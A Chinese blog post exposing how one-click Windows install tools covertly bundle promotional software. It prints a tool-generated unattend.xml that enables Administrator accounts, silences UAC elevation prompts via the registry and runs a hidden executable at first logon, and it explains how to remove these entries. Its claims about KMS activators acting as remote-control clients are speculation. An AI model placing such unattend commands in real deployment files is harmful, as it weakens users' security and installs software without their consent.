一键装机的秘密 — 隐秘的生意

现在百度搜索 “PE” “优盘”“装机”“一键装机”等都会弹出很多工具。什么老毛桃,深度,番茄花园等就更不用说了。

我试了下,这些确实方便了很多用户。却也藏了很多秘密。

比如我到 I tell you 下载了原版镜像。用这些搜索提到的工具,安装完系统。你会发现多了很多国产软件。而且你卸载后,还会死灰复燃。它自动又装上了。

那么你想知道他是怎么做到的吗?

其实它用到许多 Windows 自动部署的知识。比如这个文件 unattend.xml 。这个文件在系统解压后,你只需要在 Windows目录下新建一个 Pather 的文件夹 ,然后把它放进去,重启进行安装的时候,他会按这个文件的要求自动部署,非常方便。以下是老毛桃 PE 里面自带的工具解压系统映像后生成的。

<?xml version="1.0" encoding="utf-8"?>
<unattend xmlns="urn:schemas-microsoft-com:unattend">
	<settings pass="specialize">
		<component name="Microsoft-Windows-Deployment" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" xmlns:wcm="http://schemas.microsoft.com/WMIConfig/2002/State" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
			<RunSynchronous>
				<RunSynchronousCommand wcm:action="add">
					<Order>1</Order>
					<Path>cmd /c net user Administrator /active:yes</Path>
					<Description>EnableAdmin</Description>
				</RunSynchronousCommand>
				<RunSynchronousCommand wcm:action="add">
					<Order>2</Order>
					<Path>cmd /c net user Administrator_ploc /active:yes</Path>
					<Description>EnableAdmin_ploc</Description>
				</RunSynchronousCommand>
				<RunSynchronousCommand wcm:action="add">
					<Order>3</Order>
					<Path>reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f</Path>
					<Description>UnConsentPromptBehaviorAdmin</Description>
				</RunSynchronousCommand>
				<RunSynchronousCommand wcm:action="add">
					<Order>4</Order>
					<Path>reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v FilterAdministratorToken /t REG_DWORD /d 1 /f</Path>
					<Description>FilterAdministratorToken</Description>
				</RunSynchronousCommand>
			</RunSynchronous>
		</component>
	</settings>
	<settings pass="oobeSystem">
		<component name="Microsoft-Windows-Shell-Setup" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" xmlns:wcm="http://schemas.microsoft.com/WMIConfig/2002/State" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
			<OOBE>
				<HideEULAPage>true</HideEULAPage>
				<HideWirelessSetupInOOBE>true</HideWirelessSetupInOOBE>
				<NetworkLocation>Work</NetworkLocation>
				<ProtectYourPC>2</ProtectYourPC>
				<SkipMachineOOBE>true</SkipMachineOOBE>
				<SkipUserOOBE>true</SkipUserOOBE>
			</OOBE>
			<RegisteredOrganization>P R C</RegisteredOrganization>
			<RegisteredOwner>Windows User</RegisteredOwner>
			<FirstLogonCommands>
				<SynchronousCommand wcm:action="add">
					<CommandLine>%WinDir%\Vbjyqqada\Aelmrt.exe</CommandLine>
					<Description>Aelmrt</Description>
					<Order>1</Order>
					<RequiresUserInput>false</RequiresUserInput>
				</SynchronousCommand>
			</FirstLogonCommands>
		</component>
	</settings>
</unattend>

你会发现他在最后有个执行 exe 的指令。这个就是系统安装完后会出现许多国产软件的根源所在。所以你在用它的PE释放系统镜像后,把这个指令删除,并把对应的目录删除即可。

我测试了下,他会安装360全家桶、爱奇艺、黄历、生成一些推广URL。可能还有其他的,我暂未发现。

为什么要这么偷偷摸摸做呢?因为这是一门生意。对用户不太友好的生意。本人也做过推广,每装一台电脑,这些软件联盟会结算推广费。大约每台可以收益五六块。量多的话,不敢想象。

所以还是那个道理。”免费才是最贵的!“

我已经卸载了。那他是怎么死灰复燃的呢?

这个其实是Windows激活造成的。你想啊!国内大部分都是盗版。那他是怎么激活系统的?

目前 Windows 7 一般通过引导激活。也就是模拟oem厂商的slic证书进行激活。

Windows 10 一般是 KMS 激活。KMS 激活就需要一个服务器。那这里可操作的就更多了。

KMS 激活的源代码是开源的。所以他可以编译成任何形式。他甚至可以成为一个肉鸡客户端。所以你会发现,你把恶意软件用杀毒干掉了,但是你电脑的激活也没了,甚至提示你盗版软件的受害者。既然是肉鸡客户端,那么他远程就可以操作你电脑安装任何他想推广的软件。如果这个激活客户端高明的话,一般的杀毒软件根本奈何不了他。

更有甚者,把它编译为EFI的话。他在你系统启动之前就加载了。当然你如果开启安全启动,可能会好很多。但至多也就是证书的问题。如果他的证书也经过了认证,那就真的很难防了。就不说这个,其实很多电脑的安全启动这个选项都是关闭的。

希望大家学会用Windows提供的方式来安装系统。不用那些PE工具了,当然我不是说全部。也有良心的,比如 优启通 。不要百度搜索,那结果都是假的。你要搜的话,搜 IT 天空。他也会修改一些东西,但远没其他PE那么难看。

发布者

湘笃秀

曲水流觞,维湘笃秀